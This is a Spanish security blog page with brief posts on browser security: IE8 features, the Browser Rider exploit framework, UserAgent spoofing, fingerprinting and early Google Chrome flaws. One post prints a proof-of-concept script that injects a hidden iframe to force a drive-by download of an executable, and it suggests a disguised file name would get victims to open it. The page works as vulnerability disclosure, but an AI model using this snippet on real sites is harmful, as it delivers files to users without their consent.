La Comunidad DragonJAR

Es una buena práctica de seguridad utilizar siempre Secure Sockets Layer (SSL) para todas las paginas que visitemos y que cuenten con este protocolo, pero muchas veces la entrada por este medio no esta de modo predeterminado, en el siguiente articulo podremos ver como configurar nuestro navegador de tal forma que si un sitio web cuenta con SSL entremos de forma predeterminada por el, “asegurando” los datos que enviemos al sitio en cuestión.

Leer más…

Internet Explorer es el navegador mas utilizado en el mundo, con una cuota de mercado del 67,55% (según las ultimas estadísticas tomadas en febrero de 2009), pero día a día pierde cuota de mercado frente a navegadores como Mozilla Firefox, Safari, Opera y ahora ultimo con Google Chrome, pero ahora Microsoft quiere recuperar el terreno perdido frente a estos navegadores con la versión final del Internet Explorer 8.

Microsoft ha lanzado la versión final de su navegador estrella que incluye numerosas mejoras que abarcan desde el soporte de estándares web hasta la seguridad informática, nuevas características han sido implementadas y otras mejoradas como el filtro de sitios maliciosos (phishing, spyware, malware, entre otros), se ha agregado un filtro para prevenir ataques XSS de sitios comprometidos, se han “inspirado” en la característica de Google Chrome para navegar de “incognito” (sin almacenar cookies, historial, cache, ni contraseñas) para implementarla con el nombre de InPrivate en Internet Explorer 8. Leer más…

Browser Rider es un framework de hacking para construir payloads que explotan el navegador. El objetivo del proyecto es proporcionar una interfaz simple, potente y flexible para cualquier exploit de cara al cliente. Browser Rider no es un concepto nuevo. Herramientas similares, tales como BeEF o Backframe explotan el mismo concepto. Sin embargo, la mayoría de las otras alternativas a Browser Rider están abandonadas, no se actualizan y no están documentadas. Browser Rider quiere llenar esos vacios, proporcionando una mejor alternativa…

Leer más…

Todos los trucos mágicos tratan sobre sugestión, psicología y espectacularidad, o tal vez como diría Cutter, cada truco de magia consta de 3 partes: la prenda (donde el mago muestra algo ordinario), la conversión (donde lo ordinario se convierte en algo extraordinario), y el prestigio (donde lo extraordinario se convierte en algo nunca antes visto).

De una forma similar, en el mundo real las brechas de seguridad son una combinación de características que a menudo encontrarás en las ejecuciones de habilidosos magos. Por eso, permíteme presentarte una forma simplista de ataque, tal vez tan simple que, de hecho, podría funcionar mucho mas a menudo de lo que admitimos, la cual usa habilidosamente sugestión, psicología y una gran dosis de espectacularidad.

Todos hemos escuchado sobre clickjacking y sabemos que es un bug de diseño y por consiguiente es dificil tratar con el. Sin embargo, ¿Hay otras áreas defectuosas de los navegadores modernos que puedan ser abusadas? Por supuesto, las hay. Solo que toma su tiempo encontrarlas todas porque por lo general estan tan bien ocultas bajo nuestras creencias comunes, prejuicios e ignorancia. Veamos este código: Leer más…

Split Browser es un plugin para Firefox, permite dividir cuantas veces quieras una ventana de tu navegador y en cada división que hagas poner un portal diferente, es lo mismo que hace el “terminator” para quienes usamos mucho la consola en GNU/Linux pero ahora en nuestro navegador preferido.

Ensayalo y notaras la diferencia, especialmente si tienes una resolución por encima de los 1024*768 en el que sobra mucho espacio en la mayoría de las páginas que visitas.

Instalar Split Browser para Mozilla Firefox

Me entero gracias a chema alonso, sobre una nueva técnica utilizada para detectar el navegador de un visitante llamada Web Browsing Fingerprinting, esta técnica se se basa en la respuesta brindada por el navegador ante una petición especifica, como la respuesta a dicha petición varían según el navegador y su versión esto permite identificarlo sin hacer uso de su “UserAgent”.

El UserAgent es el nombre que identifica cada navegador y que envía cuando realiza una petición a un sitio web, pero este puede ser cambiado fácilmente (de forma manual o utilizando plugins como el User Agent Switcher para firefox) haciéndose pasar por otro navegador/bot/etc….

Por ejemplo, si encontramos un sitio web diseñado solo para iPhone, que permite ser visitado solo desde este dispositivo haciendo la validación por medio de su “UserAgent”, bastaría con cambiar el identificador en nuestro navegador  por “Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5F136 Safari/525.20” (UserAgent de un iPhone 3G) y podríamos entrar a este sitio “solo para iPhone” sin tener uno.

La cosa es distinta si en el portal se implementa el Web Browsing Fingerprinting ya que se ignora el valor enviado por el UserAgent y se intenta identificar el navegador por la respuesta que da a una petición especifica, WBfingerprinting es un sencillo código javascript que nos muestra el funcionamiento de esta técnica, pueden ver una prueba de concepto corriendo en los servidores de informatica64.

De momento solo son detectados los principales navegadores, pero su código fuente esta disponible para que puedas adaptarlo a tus necesidades.

Mas Información:
Web Browsing Fingerprinting
Javascript Web Browser Fingerprinting
Código Fuente
Un buen listado de UserAgent’s lo encuentran en zytrax

El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome

Ayer les comentaba sobre la Primera Vulnerabilidad en Google Chrome, hoy Rishi Narang ha descubierto una nueva vulnerabilidad que permite bloquear TODAS las pestañas de el ya famoso Navegador de Google.

El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador (ver imagen). Leer más…

No ha pasado ni 24 horas desde que google anuncio oficialmente su navegador “Google Chrome” y ya ha sido detectada la primera Vulnerabilidad en este.

Google Chrome es  vulnerable a “carpet bombing“, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource  Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa. Leer más…